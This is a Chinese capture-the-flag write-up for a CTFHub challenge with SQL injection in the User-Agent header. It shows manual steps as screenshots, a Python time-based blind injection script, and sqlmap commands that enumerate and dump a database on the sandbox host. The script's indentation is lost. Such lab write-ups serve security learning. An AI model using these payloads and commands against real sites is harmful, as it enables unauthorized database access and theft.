手注
打开靶机
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132621821-743268908.png)
查看页面信息
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132647713-285698803.png)
抓取数据包
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132742207-203352817.png)
根据提示注入点在User-Agent文件头中
开始尝试注入
成功查到数据库名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318132926844-983877383.png)
查询数据表名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133108961-77321255.png)
查询字段名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133213013-1875627322.png)
查询字段信息
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133359440-1230303218.png)
成功拿到flag
盲注
测试是否存在时间盲注
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318133914684-740489584.png)
测试成功,开始盲注
查询数据库名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318134436999-218326523.png)
查询数据表名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318140706436-739447313.png)
查询字段名
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318140850527-1717441640.png)
查询字段信息
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318141953303-263328504.png)
成功拿到flag
附上脚本
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import requests
import sys
import time
session=requests.session()
url = "http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/"
name = ""
# for i in range(1,20):
# print(i)
# for j in range(31,128):
# j = (128+31) -j
# str_ascii=chr(j)
# #数据库名
# #payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))
# #表名
# #payolad = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
# #字段名
# payolad = "if(substr((select group_concat(column_name) from information_schema.columns where table_name='rkhbzrszjl' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
# headers = {'User-Agent': payolad}
# start_time=time.time()
# str_get = session.get(url,headers=headers)
# end_time = time.time()
# t = end_time - start_time
# if t > 1:
# if str_ascii == " ":
# sys.exit()
# else:
# name+=str_ascii
# break
# print(name)
#查询字段内容
for i in range(1,50):
print(i)
for j in range(31,128):
j = (128+31) -j
str_ascii=chr(j)
payolad = "if(substr((select kdulqytdrv from sqli.rkhbzrszjl),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)
headers = {'User-Agent': payolad}
start_time=time.time()
str_get = session.get(url,headers=headers)
end_time = time.time()
t = end_time - start_time
if t > 1:
if str_ascii == "+":
sys.exit()
else:
name += str_ascii
break
print(name)
sqlmap
查询数据库名
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 --dbs
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143145332-1594660119.png)
查询数据表名
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143227505-1346504864.png)
查询字段名
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T rkhbzrszjl --columns
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143314886-1315446009.png)
查询字段信息
python2 sqlmap.py -u http://challenge-b9c5b7da113041c6.sandbox.ctfhub.com:10080/ --level 3 -D sqli -T rkhbzrszjl -C kdulqytdrv --dump
![](https://img2020.cnblogs.com/blog/1753051/202003/1753051-20200318143445258-886298990.png)
成功拿到flag